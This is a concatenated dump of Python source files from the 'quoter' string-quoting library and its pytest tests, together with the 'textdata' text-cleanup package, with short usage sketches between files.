def __init__(self, *args, **kwargs):
"""
Create a quoting style.
"""
opts = self.options = self.__class__.options.push(kwargs)
self._interpret_args(args)
def _interpret_pair(self, opts):
if opts.pair is not Transient:
opts.prefix, opts.suffix = halfstr(opts.pair)
opts.pair = Transient
def _interpret_args(self, args):
"""
Consume 'flat' *args if present when object is constructed.
Interpret them, and possibly also options already set.
"""
opts = self.options
self._interpret_pair(opts)
if args:
used = opts.addflat(args, ['prefix', 'suffix'])
if 'suffix' not in used:
opts.suffix = opts.prefix
# this suffix = prefix behavior appropriate for flat args only
def _whitespace(self, opts):
"""
Compute the appropriate margin and padding strings.
"""
pstr = ' ' * opts.padding if isinstance(opts.padding, int) else opts.padding
mstr = ' ' * opts.margin if isinstance(opts.margin, int) else opts.margin
return (pstr, mstr)
# could extend the padding and margins with tuples to enable
# asymmetric before/after settings
def _output(self, parts, opts):
"""
Given a list of string parts, concatenate them and output
with the given encoding (if any).
"""
outstr = ''.join(parts)
return outstr.encode(opts.encoding) if opts.encoding else outstr
def __call__(self, *args, **kwargs):
"""
Quote the value, according to the current options.
"""
opts = self.options.push(kwargs)
self._interpret_pair(opts)
pstr, mstr = self._whitespace(opts)
sval = opts.sep.join(stringify(a) for a in args)
prefix = opts.prefix or ''
suffix = opts.suffix or ''
parts = [ mstr, prefix, pstr, sval, pstr, suffix, mstr ]
return self._output(parts, opts)
def clone(self, **kwargs):
"""
Create a new instance whose options are chained to this instance's
options (and thence to self.__class__.options). kwargs become the
cloned instance's overlay options.
"""
cloned = self.__class__()
cloned.options = self.options.push(kwargs)
cloned._interpret_pair(cloned.options)
return cloned
# NB clone takes only kwargs, not flat args, contra constructor
but = clone
# create some default named styles
quote = StyleSet(factory=Quoter,
instant=False,
immediate=Quoter("'"))
braces = quote._define("braces", pair='{}')
brackets = quote._define("brackets", pair='[]')
angles = quote._define("angles", pair='<>')
parens = quote._define("parens", pair='()')
qs = single = quote._define("qs single", "'")
qd = double = quote._define("qd double", '"')
qt = triple = quote._define("qt triple", '"""')
qb = backticks = quote._define("qb backticks", "`")
qdb = doublebackticks = quote._define("qdb doublebackticks", "``")
# and some Unicode styles
anglequote = guillemet = quote._define("anglequote guillemet",
pair=six.u('\u00ab\u00bb'))
chevron = quote._define("chevron", pair=six.u('\u2039\u203a'))
curlysingle = quote._define("curlysingle", pair=six.u('\u2018\u2019'))
curlydouble = quote._define("curlydouble", pair=six.u('\u201c\u201d'))
class LambdaQuoter(Quoter):
"""
A Quoter that uses code to decide what quotes to use, based on the value.
"""
options = Quoter.options.add(
func = None,
prefix = Prohibited,
suffix = Prohibited,
pair = Prohibited,
)
def _interpret_args(self, args):
"""
Consume 'flat' *args if present when object is constructed.
Interpret them, and possibly also options already set.
"""
if args:
self.options.addflat(args, ['func'])
def __call__(self, value, **kwargs):
"""
Quote the value, based on the instance's function.
"""
opts = self.options.push(kwargs)
pstr, mstr = self._whitespace(opts)
prefix, value, suffix = opts.func(value)
parts = [mstr, prefix, pstr, stringify(value), pstr, suffix, mstr]
return self._output(parts, opts)
# TODO: Determine if LambdaQuoters can take multiple arguments
lambdaq = StyleSet(
factory=LambdaQuoter,
instant=False,
immediate=LambdaQuoter(lambda v: ('', 'ALL YOUR BASE ARE BELONG TO US', '')))
```
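A short, hedged sketch of the styles defined above; it imports from the `quoter.quoter` module shown here rather than the package top level, and the expected strings follow from each style's prefix/suffix pair.
```python
# Hedged usage sketch, not part of the original repository.
from quoter.quoter import Quoter, LambdaQuoter, braces, brackets, double

assert braces('x') == '{x}'
assert brackets('y') == '[y]'
assert double('z') == '"z"'

stars = Quoter('*')              # flat arg: suffix defaults to the prefix
assert stars('hey') == '*hey*'

# LambdaQuoter picks the quotes from the value itself
money = LambdaQuoter(lambda v: ('-$', abs(v), '') if v < 0 else ('$', v, ''))
assert money(-3) == '-$3'
assert money(5) == '$5'
```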
#### File: quoter/test/test_styleset.py
```python
from quoter.styleset import *
from quoter import *
import pytest
def test_basic():
s = StyleSet(Quoter)
s.braces = braces
assert s.braces('this') == '{this}'
def test_setattr():
s = StyleSet(Quoter)
s.bspace = braces.but(padding=1)
assert s.bspace('that') == '{ that }'
def test_getitem():
s = StyleSet(Quoter)
s.braces = braces
assert s['braces'] is braces
assert s['braces']('curly') == '{curly}'
def test_setitem():
s = StyleSet(Quoter)
s['braces'] = braces
assert s['braces'] is braces
assert s.braces is braces
assert s['braces']('curly') == '{curly}'
assert s.braces('curly') == '{curly}'
def test_getattr_and_definition_not_instant():
s = StyleSet(Quoter)
s._define("db", "{{", "}}")
assert s.db("work") == "{{work}}"
with pytest.raises(ValueError):
s.dbspace("{{ ", " }}")("works")
s._define("wook", prefix="WO", suffix="OK")
assert s.wook('this') == "WOthisOK"
def test_getattr_factory_instant():
h = StyleSet(HTMLQuoter, instant=True)
assert h.pre('this', ".work") == "<pre class='work'>this</pre>"
assert h.free('open source', ".liberty") == \
"<free class='liberty'>open source</free>"
def test_immediate():
q = StyleSet(immediate=brackets)
assert q("this") == '[this]'
qnone = StyleSet()
with pytest.raises(KeyError):
qnone("this")
def test_repr():
s = StyleSet()
s.a = 1
s['b'] = 2
assert repr(s) in [ 'StyleSet(a=1, b=2)', 'StyleSet(b=2, a=1)']
def test_examples():
"""
Test examples from the docs
"""
colon = quote._define('colon', ':')
assert colon('this') == quote.colon('this') == ':this:'
assert quote("super") == "'super'"
cq = StyleSet(factory=Quoter,
immediate=Quoter(':'))
cq._define("two", Quoter('::'))
assert cq('this') == ':this:'
assert cq.two('this') == '::this::'
``` |
{
"source": "jonathaneunice/textdata",
"score": 3
} |
#### File: textdata/textdata/core.py
```python
import os
import re
from itertools import groupby
import sys
import warnings
from .util import noquotes, ensure_text, CSTRIP, _PY2
if not _PY2:
basestring = str
__all__ = 'lines text textlines textline words paras'.split()
def lines(source, noblanks=True, dedent=True, lstrip=False, rstrip=True,
expandtabs=False, cstrip=True, join=False):
"""
Grab lines from a string. Discard initial and final lines if blank.
:param str|list source: Text (or list of text lines) to be processed
:param bool dedent: a common prefix should be stripped from each line (default `True`)
:param bool noblanks: allow no blank lines at all (default `True`)
:param bool lstrip: all left space be stripped from each line (default `False`);
dedent and lstrip are mutually exclusive
:param bool rstrip: all right space be stripped from each line (default `True`)
:param Union[bool,int] expandtabs: should all tabs be expanded? if int, by how much?
:param bool cstrip: strips comment strings from # to end of each line (like Python itself)
:param bool|str join: if False, no effect; otherwise a string used to join the lines
:return: a list of strings
:rtype: list
"""
text = ensure_text(source)
if cstrip:
text = CSTRIP.sub('', text)
if expandtabs:
text = text.expandtabs() if expandtabs is True else text.expandtabs(expandtabs)
textlines = text.splitlines()
# remove blank lines if noblanks
if noblanks:
textlines = [line for line in textlines if line.strip() != '']
else:
# even if intermediate blank lines ok, first and last are due to Python
# formatting
if textlines and textlines[0].strip() == "":
textlines.pop(0)
if textlines and textlines[-1].strip() == "":
textlines.pop()
# TODO: decide if these should be while loops, eating all prefix/suffix blank lines
if dedent and not lstrip:
if expandtabs:
nonblanklines = [line for line in textlines if line.strip() != ""]
else:
# if not expanding all tabs, expand tabs at least for purpose of finding common prefix
nonblanklines = [line.expandtabs() for line in textlines if line.strip() != ""]
prefix = os.path.commonprefix(nonblanklines)
prelen, maxprelen = 0, len(prefix)
while prelen < maxprelen and prefix[prelen] == ' ':
prelen += 1
if prelen:
textlines = [line[prelen:] for line in textlines]
# perform requested left and right space stripping (must be done
# late so as to not interfere with dedent's common prefix detection)
if lstrip and rstrip:
textlines = [line.strip() for line in textlines]
elif lstrip:
textlines = [line.lstrip() for line in textlines]
elif rstrip:
textlines = [line.rstrip() for line in textlines]
if join is False:
return textlines
else:
join = '' if join is True else join
return join.join(textlines)
def text(source, **kwargs):
"""
Like ``lines()``, but returns result as unified text. Useful primarily
because of the nice cleanups ``lines()`` does.
:param str|list source: Text (or list of text lines) to be processed
:param str join: String to join lines with. Typically newline for line-oriented
text but change to " " for a single continuous line.
:return: the cleaned string
:rtype: str
"""
kwargs.setdefault('join', '\n')
return lines(source, **kwargs)
def textlines(*args, **kwargs):
"""
Deprecated alias for ``text``. Use it instead.
"""
warnings.warn('Deprecated alias for text(). Use it instead.', DeprecationWarning)
return text(*args, **kwargs)
def textline(source, cstrip=True):
"""
Like ``text()``, but returns result as unified string that is not
line-oriented. Really a special case of ``text()``
:param str|list source:
:param bool cstrip: Should comments be stripped? (default: ``True``)
:return: the cleaned string
:rtype: str
"""
pars = paras(source, keep_blanks=False, join=" ", cstrip=cstrip)
return "\n\n".join(pars)
# define word regular expression and pre-define quotes
WORDRE = re.compile(r"""\s*(?P<word>"[^"]*"|'[^']*'|\S+)\s*""")
def words(source, cstrip=True, sep=None):
"""
Returns a sequence of words, like qw() in Perl. Similar to s.split(),
except that it respects quoted spans for the occasional word (really,
phrase) with spaces included. If the ``sep`` argument is provided,
words are split on that boundary (rather like ``str.split()``). Either
the standard space and possibly-quoted word behavior should be used,
or the explicit separator. They don't cooperate well.
Like ``lines``, removes comment strings by
default.
:param str|list source: Text (or list of text lines) to gather words from
:param bool cstrip: Should comments be stripped? (default: ``True``)
:param Optional[str] sep: Optional explicit separator.
:return: list of words/phrases
:rtype: list
"""
text = ensure_text(source)
if cstrip:
text = CSTRIP.sub('', text)
if sep is None:
text = text.strip()
parts = re.findall(WORDRE, text)
return [noquotes(p) for p in parts]
else:
parts = text.split(sep)
return [p.strip() for p in parts]
def paras(source, keep_blanks=False, join=False, cstrip=True):
"""
Given a string or list of text lines, return a list of lists where each
sub list is a paragraph (list of non-blank lines). If the source is a
string, use ``lines`` to split into lines. Optionally can also keep the
runs of blanks, and/or join the lines in each paragraph with a desired
separator (likely a newline if you want to preserve multi-line structure
in the resulting string, or " " if you don't). Like ``words``,
``lines``, and ``textlines``, will also strip comments by default.
:param str|list source: Text (or list of text lines) from which paras are to be gathered
:param keep_blanks: Should internal blank lines be retained (default: ``False``)
:param bool|str join: Should paras be joined into a string? (default: ``False``).
:param bool cstrip: Should comments be stripped? (default: ``True``)
:return: list of strings (each a paragraph)
:rtype: list
"""
# make sure we have lines, with suitable cleanups
# note that lines() will guarantee ensure_text()
sourcelines = lines(source, noblanks=False, cstrip=cstrip)
# get paragraphs
results = []
line_not_blank = lambda l: l.strip() != ""
for non_blank, run in groupby(sourcelines, line_not_blank):
if non_blank or keep_blanks:
run_list = list(run)
payload = join.join(run_list) if join is not False else run_list
results.append(payload)
return results
```
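A small, hedged example of the main entry points defined above; it imports from `textdata.core` directly (matching the module path shown) and demonstrates the default cleanups: comment stripping, dedenting, and blank-line removal.
```python
# Hedged usage sketch, not part of the original repository.
from textdata.core import lines, text, words, paras

source = """
    first line   # trailing comment is stripped
    second line

    third line
"""
assert lines(source) == ['first line', 'second line', 'third line']
assert text(source) == 'first line\nsecond line\nthird line'
assert words('a "b c" d') == ['a', 'b c', 'd']
assert paras(source, join=' ') == ['first line second line', 'third line']
```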
#### File: textdata/textdata/eval.py
```python
from ast import literal_eval as ast_literal_eval
from .util import noquotes
def literal_eval(s):
"""
Wrapper around ``ast.literal_eval`` that returns its return value,
if possible, but returns the original string in cases where
``ast.literal_eval`` raises an exception.
"""
try:
return ast_literal_eval(s)
except (ValueError, SyntaxError):
return s
# evaluation functions
identity = lambda s: s
minimal = lambda s: s.strip()
natural = lambda s: literal_eval(s.strip())
full = lambda s: literal_eval(noquotes(s.strip()))
# mapping of evaluate parameter to evaluation functions
EVALUATE = {
'none': identity,
None: identity,
'minimal': minimal,
False: minimal,
'natural': natural,
True: natural,
'full': full,
}
def evaluation(value, how='natural'):
"""
Standard value evaluator. Defaults to the "natural"
Python literal encoding.
"""
if hasattr(how, '__call__'):
evaluator = how
else:
try:
evaluator = EVALUATE[how]
except KeyError:
raise ValueError('{!r} not a known evaluation mode'.format(how))
try:
return evaluator(value)
except Exception as e:
print(e)
return minimal(value)
```
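The evaluation modes above are easiest to see by example. This is a hedged sketch importing from the `textdata.eval` module shown here; the expected values follow from the `identity`/`minimal`/`natural`/`full` functions defined above.
```python
# Hedged usage sketch, not part of the original repository.
from textdata.eval import literal_eval, evaluation

assert literal_eval('3') == 3
assert literal_eval('[1, 2]') == [1, 2]
assert literal_eval('hello world') == 'hello world'   # falls back to the raw string

assert evaluation(' 42 ') == 42                        # default 'natural' mode
assert evaluation(' 42 ', how='minimal') == '42'       # stripped only
assert evaluation('"hi"', how='full') == 'hi'          # surrounding quotes removed first
```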
#### File: textdata/textdata/util.py
```python
import re
import sys
try:
from itertools import tee, filterfalse
except ImportError:
# Accommodate prior name for filterfalse in Python 2
from itertools import tee, ifilterfalse as filterfalse
_PY2 = sys.version_info[0] == 2
if not _PY2:
basestring = str
# regex to find Python comments in the middle of (multiline) strings
CSTRIP = re.compile(r'#.*$', re.MULTILINE) # comment stripping regex
def ensure_text(source):
"""
Given either text or an iterable, return the corresponding text. This
common pre-process function allows ``textdata`` routines to take varied
input, yet confidently process considering only the text case.
"""
if isinstance(source, basestring):
return source
else:
# a list, tuple, iterator, or generator giving lines of text;
# convert to a single text for standard cleanups
return "\n".join(list(source))
QUOTES = ("'", '"')
def noquotes(s):
"""
If the given string starts and ends with a quote symbol, return its 'middle' with
that quote symbol stripped off both ends.
:param str s: Input string
:return: String without quotes
:rtype: str
"""
if s.startswith(QUOTES) and s.endswith(QUOTES):
return s.strip(s[0])
else:
return s
def partition(pred, iterable):
"""
Use a predicate to partition entries into false entries and true entries.
Derived from Python itertools cookbook at
https://docs.python.org/3/library/itertools.html
But unlike default definition, returns lists rather than generators.
"""
# partition(is_odd, range(10)) --> 0 2 4 6 8 and 1 3 5 7 9
t1, t2 = tee(iterable)
return list(filterfalse(pred, t1)), list(filter(pred, t2))
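# A hedged usage sketch (added for illustration, not part of the original
# module); it only runs when the file is executed directly.
if __name__ == '__main__':
    assert noquotes('"hello"') == 'hello'
    assert noquotes('plain') == 'plain'
    evens, odds = partition(lambda n: n % 2, range(6))
    assert (evens, odds) == ([0, 2, 4], [1, 3, 5])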
``` |